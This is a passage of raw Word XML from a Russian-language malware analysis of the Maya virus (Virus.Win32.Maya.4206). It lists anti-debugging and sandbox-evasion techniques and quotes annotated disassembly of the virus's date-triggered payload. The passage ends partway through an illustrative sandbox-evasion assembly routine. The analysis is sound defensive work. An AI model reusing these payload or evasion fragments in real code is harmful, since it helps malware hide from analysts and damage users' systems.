      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>кибербезопасности и эволюции методов защиты и атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135674EF" w14:textId="201780A5" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc215414032"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Обфускация кода</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="6B1D2C67" w14:textId="09DF69B5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Вирус использует простую обфускацию через NOP-слайды:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D634D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Адрес: 0x0040119C (пример из lst файла)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707DAB0A" w14:textId="231772CA" w:rsidR="00457074" w:rsidRPr="00C26132" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Код</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26132">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA68C81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CODE:0040119C                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29692ED2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CODE:0040119D                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4335EECD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CODE:0040119E                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BF61C0" w14:textId="07171760" w:rsidR="00457074" w:rsidRPr="00C26132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CODE:0040119F                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410647B6" w14:textId="42312CF7" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc215414033"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Детальный анализ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4C280C9F" w14:textId="530B2284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Антиотладочные техники - это методы, используемые вредоносным программным обеспечением</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>для обнаружения и обхода анализа с помощью отладчиков. Современные вредоносные программы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>используют множество сложных техник:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37791ECE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1. Проверка флага отладки (PEB.BeingDebugged)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9FA605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2. Проверка счетчика отладочных объектов (NtQueryInformationProcess)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B0D7D8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3. Проверка на наличие отладчиков через API (IsDebuggerPresent, CheckRemoteDebuggerPresent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425564FE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4. Обнаружение отладчика через временные метки (RDTSC, GetTickCount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611030D9" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Проверка</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>исключений</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SEH - Structured Exception Handling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452EE719" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Проверка</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>флагов</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TLS (Thread Local Storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336483FF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7. Обнаружение популярных отладчиков (OllyDbg, x64dbg, WinDbg) через имена процессов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7FC70F" w14:textId="5B0892E8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8. Проверка на виртуальную машину через инструкции CPUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20D250" w14:textId="7486F5C8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При детальном анализе вируса Maya было обнаружено, что он НЕ использует ни одну из</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>этих техник. Это значительно упрощает анализ вируса с помощью отладчиков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC9981A" w14:textId="27013719" w:rsidR="00485DB5" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc215414034"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверка системного времени в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PAYLOAD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="37086D6D" w14:textId="61AA7AF3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Единственная "проверка", обнаруженная в вирусе, - это проверка системного времени в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>функции Payload. Однако эта проверка НЕ является антиотладочной техникой. Она используется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>для контроля момента активации payload, а не для обнаружения отладчика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595ABAF3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Адрес: 0x00401760 (начало функции Payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279F580A" w14:textId="08C2D9A4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Код из lst файла (строки 1083-1092) с подробным анализом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689DE60B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CODE:00401760 Payload         proc near</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8F224B" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00BA7C8D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</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:00401760                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>GetSystemTime</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">_0        ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Получить</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>системное</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>время</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A23591B" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; Функция GetSystemTime_0 вызывает GetSystemTime API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E540C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для получения текущей системной даты и времени</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8B382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Результат сохраняется в структуру SYSTEMTIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F56025" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E764594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CODE:00401765                 cmp     ss:word_401A3B[ebp], 1  ; Сравнить значение переменной word_401A3B с 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A582C50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Эта переменная, вероятно, содержит результат</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8C21E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проверки определенного условия на основе времени</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2BD68F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(например, день месяца, день недели и т.д.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D307BC" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52DCA4B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CODE:0040176D                 jnz     locret_40192C           ; Если условие НЕ выполнено - выйти из функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6FBA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Это означает, что payload активируется только при</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22104DD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выполнении определенного условия, связанного со временем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66862E5B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Например, вирус может активироваться только в определенный</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD345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день месяца или день недели</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD10C5" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47392D6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CODE:00401773                 ; ... остальной код payload ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778EDDF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Если условие выполнено, выполняется остальная часть payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE5627C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Создание файла SLAM.BMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FFF350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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                             ; - Изменение обоев рабочего стола</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601FAA5B" w14:textId="7625E361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Отображение MessageBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA6B60" w14:textId="0BCBB4DC" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>АНАЛИЗ ФУНКЦИИ GetSystemTime_0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4C289" w14:textId="6EB603CF" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Для полного понимания работы проверки времени необходимо изучить функцию GetSystemTime_0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A111F6" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00BA7C8D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>CODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:0040154</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>GetSystemTime</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">_0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>near</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3AB047" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00BA7C8D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>CODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:0040154</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2289908D" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00BA7C8D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>CODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:0040154</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>_401</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">35 ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>буфера</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>структуры</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C8D">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>SYSTEMTIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B355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CODE:00401552                 add     eax, ebp                 ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>С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учетом</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> delta offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9DBFE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CODE:00401554                 push    eax                      ; Передать адрес буфера как параметр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44395825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CODE:00401555                 mov     eax, ss:GetSystemTime[ebp] ; Получить адрес функции GetSystemTime из kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7581C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CODE:0040155B                 call    eax                      ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Вызвать</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetSystemTime(&amp;SYSTEMTIME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC0DC1" w14:textId="77777777" w:rsidR="00457074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 xml:space="preserve">                                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; Функция заполняет структуру SYSTEMTIME текущим временем:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A867F4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wYear (год, 4 цифры)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A8B00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wMonth (месяц, 1-12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A756204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wDayOfWeek (день недели, 0=воскресенье, 6=суббота)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E2845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wDay (день месяца, 1-31)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B996F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wHour (час, 0-23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A2444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wMinute (минута, 0-59)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702E48F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wSecond (секунда, 0-59)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB1830C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wMilliseconds (миллисекунды, 0-999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD2512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CODE:0040155D                 pop     ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788408D7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CODE:0040155E                 retn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C7664D" w14:textId="7C54101F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CODE:0040155E GetSystemTime_0 endp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFCE9ED" w14:textId="636B8E2D" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>После вызова GetSystemTime вирус, вероятно, проверяет определенное поле структуры SYSTEMTIME (например, день месяца или день недели) и устанавливает word_401A3B в 1, если условие выполнено.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432497F2" w14:textId="6B97E9EA" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc215414035"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Техники обхода песочниц</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="7EE6FC5A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Вирус НЕ использует техники обхода песочниц. Он не проверяет:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6C0C31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Количество процессоров</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121CAB9D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Размер памяти</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F06A98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Наличие мыши</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52362AC6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Время работы системы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC38122" w14:textId="15A5A439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lastRenderedPageBreak/>
        <w:t>- Имя пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F420B6" w14:textId="7A3304DB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ДОКАЗАТЕЛЬСТВО: В файле Virus.Win32.Maya.4206.lst нет вызовов GetSystemInfo,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>GlobalMemoryStatusEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>GetSystemMetrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>GetUserNameA</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> для проверки окружения.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Вирус будет выполняться в любой среде, включая песочницы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31032D64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sandbox_evasion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F12DF7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push    ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7D585C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mov     ebp, esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3B66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5C68BC45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; 1. Проверка количества процессоров</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B87D9" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074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457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>call    dword ptr [GetSystemInfo_ptr]</w:t>
      </w:r>
    </w:p>
